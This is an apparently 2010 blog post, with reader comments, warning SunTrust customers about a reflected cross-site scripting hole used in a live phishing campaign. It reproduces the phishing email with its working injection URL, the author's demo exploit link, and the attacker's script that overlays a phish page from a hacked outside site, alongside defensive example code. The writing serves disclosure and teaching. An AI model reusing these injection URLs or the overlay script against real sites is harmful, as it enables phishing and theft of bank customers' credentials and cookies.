OUCH! SunTrust’s Web site is PWN3d!

I know some of my regular readers have accounts with SunTrust bank. If you do, and you recently received an email telling you that your account records need to be updated, and you clicked on any link in that email, change your account password IMMEDIATELY. It is not necessary for you to have typed in your account username and password at the prompt; the attack can lift the SunTrust cookies from your browser.

You see, SunTrust left a security hole in their Web server; this security hole allows an attacker to use what’s called a “cross site scripting” attack to take control of the pages you see when you browse to SunTrust URLs.

I have confirmed this security hole exists, and have created a quick demo to show how it works. If you click on this link:

Clicky here
[EDIT:] Within 5 minutes of my making this post, LiveJournal’s servers flagged the link as a cross-site scripting link and disabled it. Nicely done! Kudos to the LJ team for making their software aware of hostile links. If you want to try out my demo of the vulnerability, copy into your browser:

http://helpcenter.suntrust.com/doc/sn6400.xml?SID=586&TOPNAME=%22%3E%3C/a%3E%3Cscript%20src=%22http://www.obsidianfields.com/suntrustxssdemo/xssdemo.js

you will be taken to the Web site helpcenter.suntrust.com, a legitimate SunTrust Web page.

[UPDATE]: As of Wednesday afternoon, SunTrust’s IT people have fixed the XSS hole.

But wait! What do you see? If the security hole still exists when you visit this URL, you’ll see a red Web page reading “The cross-site scripting vulnerability at helpcenter.suntrust.com IS STILL ACTIVE”. What’s going on?

What’s going on is that helpcenter.suntrust.com can be fooled just by manipulating the URL into loading content from anywhere on the Web, overwriting whatever is supposed to be there. No, I don’t have access to the SunTrust servers directly, and neither does the attacker. What I CAN do is create a Web page with anything I want, and then create a link that causes my Web page to load at helpcenter.suntrust.com in place of what is supposed to be there. And, if I wanted to, I could also read SunTrust cookies stored in your browser as well, presumably including login cookies if you have ticked the “remember me” checkbox on SunTrust’s login page.

In English, that means you cannot trust anything you see displayed at helpcenter.suntrust.com, even if you are 100% positive that the URL in your browser is in fact helpcenter.suntrust.com. It is trivial to create malicious links that change the content displayed at helpcenter.suntrust.com, as I have shown in my example. This security hole is currently being used in a “phishing” attack that shows you what looks like a perfectly legitimate login page at helpcenter.suntrust.com, but is in fact a page under the control of the hacker on a hacked Web server in Australia.

The attack is currently using a phony email with the title “Your account records have not been updated for too long”. This email looks like a bog-standard phishing attack of the kind we all see fifteen or twenty times a day. The full email looks like this:

Return-Path: <saojorge@linux.linuxcpanelhost.com>
Received: from mtain-md04.r1000.mx.aol.com (mtain-md04.r1000.mx.aol.com [172.29.96.88]) by air-de06.mail.aol.com (v129.4) with ESMTP id MAILINDE061-5eb64bf34aeb237; Tue, 18 May 2010 22:20:27 -0400
Received: from linux.linuxcpanelhost.com (linux.linuxcpanelhost.com [74.86.210.130])
by mtain-md04.r1000.mx.aol.com (Internet Inbound) with ESMTP id 521D03800009D
for <tacitr@aol.com>; Tue, 18 May 2010 22:20:27 -0400 (EDT)
Received: from saojorge by linux.linuxcpanelhost.com with local (Exim 4.69)
(envelope-from <saojorge@linux.linuxcpanelhost.com>)
id 1OEVAI-0005bM-Di
for tacitr@aol.com; Tue, 18 May 2010 19:21:06 -0300
To: tacitr@aol.com
Subject: Your account records have not been updated for too long
MIME-Version: 1.0
Content-type: text/html; charset=UTF-8
From: SunTrust <support@en.suntrust.com>
Message-Id: <E1OEVAI-0005bM-Di@linux.linuxcpanelhost.com>
Date: Tue, 18 May 2010 19:21:06 -0300
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - linux.linuxcpanelhost.com
X-AntiAbuse: Original Domain - aol.com
X-AntiAbuse: Originator/Caller UID/GID - [1063 32007] / [47 12]
X-AntiAbuse: Sender Address Domain - linux.linuxcpanelhost.com
X-Source:
X-Source-Args:
X-Source-Dir:
x-aol-global-disposition: S
x-aol-sid: 3039ac1d60584bf34aeb424c
X-AOL-IP: 74.86.210.130
X-Mailer: Unknown (No Version)

<div style="padding:15px;font-family:arial;font-size:12px"><p style="margin:0 0 15px 0"><b>Hello tacitr,</b></p>
<p style="margin:0 0 20px 0"><span style="font-size:14px;color:red"><b>Your account records haven’t been updated for too long</b></span><br><br>
Please note that some of your personal information might be outdated.<br>To reactivate your account, please visit our Help Center:</p>
<p style="margin:0 0 20px 0"><a href="http://helpcenter.suntrust.com/doc/sn6400.xml?SID=5869ef9427faf3a485d236a6ec2ccabdff1f394b903709f3da2a96d99989532b04a1158347e000bc4832bed19b3cc21863a836f0ac43a73de1f1f3b09408808f152c25c47ed28cb799ccb1b5ea2d6715d3411586f03338d3852223611642889d&TOPNAME=%22%3E%3C/a%3E%3Cscript%20src=%22http://124.217.229.185/~demadm/logs/help.js%22%3E%3C/script%3E%3Cparam%20class=%22&UID=75178461717441605271041666529446753430202992796716260595685782413851209232661" target="_blank">
http://helpcenter.suntrust.com/doc/sn6400.xml?SID=5869ef9427faf3a485d236a…</a></p><p style="margin:0 0 20px 0">Best regards,<br>SunTrust Customer Service<br><br>
<span style="color:gray">SunTrust Bank,<br>P.O. Box 4418 GA-Atlanta-0795,<br>Atlanta, GA 30302-4418</span></p></div>


The interesting thing you will notice about this phish, which makes it very different from garden-variety phishing attacks, is that it actually contains a real SunTrust URL. The SunTrust Web page at

http://helpcenter.suntrust.com/doc/sn6400.xml

contains a type of security hole known as a “cross-site scripting flaw”. In simple terms, it means that the Web page is poorly created in such a way that I can trick it into loading and running a JavaScript from anywhere on the Web.

In this case, what happens is that the Web page at http://helpcenter.suntrust.com/doc/sn6400.xml is being used to load and run a JavaScript located at http://124.217.229.185/~demadm/logs/help.js. Look closely at the URL in the attack email. See all the junk after the question mark? Most of that junk is bogus, just there to throw off non-technical Web users.


The URL in the email can be divided into three parts, shown here one per line:

http://helpcenter.suntrust.com/doc/sn6400.xml
?SID=5869…(and so on)…
&TOPNAME=%22%3E%3C/a%3E%3Cscript%20src=%22http://124.217.229.185/~demadm/logs/help.js%22%3E%3C/…(and so on)…

The first part is the SunTrust Web page. Everything after the question mark is made up of parameters that are handed to the Web page so that it knows what to do. Normally, there would just be the second part, SID, which I imagine would be a number corresponding to a text file to display.

Ah, but the third part, TOPNAME…

The Web designers at SunTrust did not check what was being passed to the Web page in that parameter. The Web page will blindly accept and execute anything it is passed. The TOPNAME part is the address of a malicious JavaScript. When it is passed to the Web page, the Web page executes the script, without regard to where it came from, and displays the result.
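To make the flaw concrete, here is an added example in JavaScript (my own model, not SunTrust’s code; the real sn6400.xml template is not public) of a page that reflects the TOPNAME parameter into an anchor attribute, beside the same page with output encoding applied. The anchor-attribute shape is an assumption drawn from the payload: its leading `"></a>` only does anything if TOPNAME lands inside a quoted attribute of an `<a>` element. The script address `http://attacker.example/help.js` is a constructed stand-in for the one in the email.

```javascript
// Added example: a model of a page that reflects a query parameter into
// markup, first as the post describes the SunTrust page behaving, then
// with output encoding. The real sn6400.xml template is not public; the
// anchor-attribute shape is assumed from the payload's leading "></a>.

// Vulnerable: TOPNAME is concatenated straight into an attribute value.
function renderVulnerable(topname) {
  return '<a href="/doc/sn6400.xml" title="' + topname + '">Help</a>';
}

// Encode the characters that carry meaning in HTML text and attributes.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened: the same template, but the value is encoded before insertion,
// so a quote in the input can no longer close the attribute.
function renderHardened(topname) {
  return '<a href="/doc/sn6400.xml" title="' + escapeHtml(topname) + '">Help</a>';
}

// List the src of every <script> element present in a rendered page; this
// is what a browser would actually fetch and run.
function listScriptSources(html) {
  const re = /<script\b[^>]*\bsrc\s*=\s*"([^"]*)"/gi;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// The TOPNAME value from the phishing email, percent-decoded, with the
// script address replaced by a constructed stand-in.
const PHISH_TOPNAME = '"></a><script src="http://attacker.example/help.js"></script><param class="';
// A legitimate-looking value for comparison (constructed).
const PLAIN_TOPNAME = 'Online Banking';

console.log('vulnerable:', renderVulnerable(PHISH_TOPNAME));
console.log('  scripts loaded:', listScriptSources(renderVulnerable(PHISH_TOPNAME)));
console.log('hardened:  ', renderHardened(PHISH_TOPNAME));
console.log('  scripts loaded:', listScriptSources(renderHardened(PHISH_TOPNAME)));
```

For ordinary input the two renderers produce identical markup; only hostile input differs, which is why output encoding costs nothing to apply everywhere a parameter is echoed. As a second layer, a Content-Security-Policy such as `script-src 'self'` would stop the browser from fetching help.js from another host even if an encoding step were missed.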

Here are the contents of the malicious script:

// The attacker's script as served from help.js
document.title = 'SunTrust - Identification';

// Inject a stylesheet that hides the legitimate page content (the body's
// table) and makes an iframe fill the whole window
document.write('<style>');
document.write('html {');
document.write('height: 100%;');
document.write('overflow: hidden;');
document.write('}');
document.write('body {');
document.write('overflow: hidden;');
document.write('height: 100%;');
document.write('margin: 0;');
document.write('}');
document.write('iframe {');
document.write('border: 0;');
document.write('overflow: auto;');
document.write('overflow-x: hidden;');
document.write('margin: 0;');
document.write('width: 100%;');
document.write('height: 100%;');
document.write('}');
document.write('body table {');
document.write('display: none;');
document.write('}');
document.write('</style>');

// Write an iframe that loads the phish page hosted on the hacked
// designcats.com.au site
document.write('<iframe id="mainframe" name="mainframe" src="http://designcats.com.au/forms/language/v/" frameborder="0" border="0"></iframe>');

// Once the page has finished loading, move the iframe to the end of the
// body so it sits over whatever the real page rendered
window.onload = function() {
  var frm = document.getElementById('mainframe');
  document.body.appendChild(frm);
}

If you don’t know JavaScript, basically what this script instructs the page to do is:

1. Change the title of the page to read “SunTrust: identification”;
2. Hide the content of the page;
3. Load new content from http://designcats.com.au/forms/language/v/ and show it.

The Web site at designcats.com.au is a hacked site that the hacker has placed a phish page on. So the email contains a real SunTrust Web site address, with instructions to load a script that will blank out the page and replace it with the phish page. The hacker’s phish page also attempts to load any SunTrust cookies, if it can.
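The decoding the post walks through by hand can be done by a small link checker. This is an added example in JavaScript, not from the post: it pulls the query string apart, flags parameters whose decoded value contains an attribute breakout or tag markup, and lists any script sources such a value would load together with whether they point at a host other than the one in the link. The first sample link is the demo URL from this post; the second is a constructed benign link with the same page and parameter names.

```javascript
// Added example: a link checker for reflected-XSS phishing links of the
// kind described in the post. Not part of the original post.

// Decoded parameter values containing these patterns are what turn a
// harmless-looking bank URL into a script loader.
const ATTR_BREAKOUT_RE = /["']\s*>/;   // closes a quoted attribute, e.g.  ">
const TAG_RE = /<\/?[a-z]/i;           // opens or closes an HTML tag
const SCRIPT_SRC_RE = /<script\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)/gi;

// Return every script address referenced inside a decoded value.
function extractScriptSources(value) {
  return Array.from(value.matchAll(SCRIPT_SRC_RE), (m) => m[1]);
}

// Analyse one link: returns the link's host, a list of findings and a
// summary flag. URLSearchParams does the percent-decoding for us.
function analyzeLink(href) {
  const url = new URL(href);
  const findings = [];
  for (const [name, value] of url.searchParams) {
    if (ATTR_BREAKOUT_RE.test(value)) findings.push({ param: name, reason: 'attribute-breakout' });
    if (TAG_RE.test(value)) findings.push({ param: name, reason: 'html-markup' });
    for (const src of extractScriptSources(value)) {
      let host = null;
      try { host = new URL(src, url).hostname; } catch (_) { /* unparseable src: leave null */ }
      findings.push({
        param: name,
        reason: 'script-src',
        source: src,
        host,
        thirdParty: host !== url.hostname,
      });
    }
  }
  return { host: url.hostname, findings, suspicious: findings.length > 0 };
}

// The demo link from this post (the script it loads is the blog author's).
const DEMO_LINK = 'http://helpcenter.suntrust.com/doc/sn6400.xml?SID=586&TOPNAME=%22%3E%3C/a%3E%3Cscript%20src=%22http://www.obsidianfields.com/suntrustxssdemo/xssdemo.js';
// Constructed benign link: same page, same parameter names, plain values.
const BENIGN_LINK = 'http://helpcenter.suntrust.com/doc/sn6400.xml?SID=586&TOPNAME=Online%20Banking';

// Human-readable report for a list of links.
function report(links) {
  return links.map((href) => {
    const r = analyzeLink(href);
    const lines = [(r.suspicious ? 'SUSPICIOUS ' : 'ok         ') + r.host];
    for (const f of r.findings) {
      let line = '  ' + f.param + ': ' + f.reason;
      if (f.source) {
        line += ' -> ' + f.source + (f.thirdParty ? ' (third-party host ' + f.host + ')' : ' (same host)');
      }
      lines.push(line);
    }
    return lines.join('\n');
  }).join('\n');
}

console.log(report([DEMO_LINK, BENIGN_LINK]));
```

The same-host check is the important one for a mail gateway or browser extension: a link whose host is the bank but whose decoded parameters name a script on some other host is exactly the shape of the attack in this email, regardless of how much padding the SID and UID values carry.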

You can see the results by clicking on the link I’ve placed above, which replaces the script at http://124.217.229.185/~demadm/logs/help.js with a script located on my server, which loads a red page reading “The cross-site scripting vulnerability at helpcenter.suntrust.com IS STILL ACTIVE.” If you click on my link, you’ll see the real SunTrust page load, then the screen will flicker as my script loads, then the page will turn red and show you the warning. If you just go to http://helpcenter.suntrust.com without any parameters, you’ll see the page you should see.

I’ve written to SunTrust to notify them that they have a security problem. Normally, I would not describe the problem or how it works until after they fix it. However, in this case, the security problem has already been discovered by the hacker underground and is being used in current, active attacks, so attempting to keep it secret at this point is pretty useless.

30 thoughts on “OUCH! SunTrust’s Web site is PWN3d!”

  1. So I should *not* check my checking account online for the time being? This would make me very, very sad.

    Since I don’t understand all the tech stuff – I just want to be sure that what you’re saying is “don’t log into suntrust right now”

    • As long as you go directly to the main page of the SunTrust site, you’re OK. The hole existed (it’s been fixed as of this afternoon) in their help center; any URL beginning with helpcenter.suntrust.com could potentially have been compromised.

  2. I have received those phishing attempts via e-mail for Suntrust in the past and am a Suntrust customer, but I’m savvy enough to know a phishing e-mail when I see one. I don’t click the links. I just pull up the e-mail’s full source and send it to their fraud department.

    • It isn’t quite the same issue, but it’s similar. In the one documented on Snopes, hackers rigged a phony popup in front of Suntrust’s window; in this one, they actually placed a phony login page inside the SunTrust window.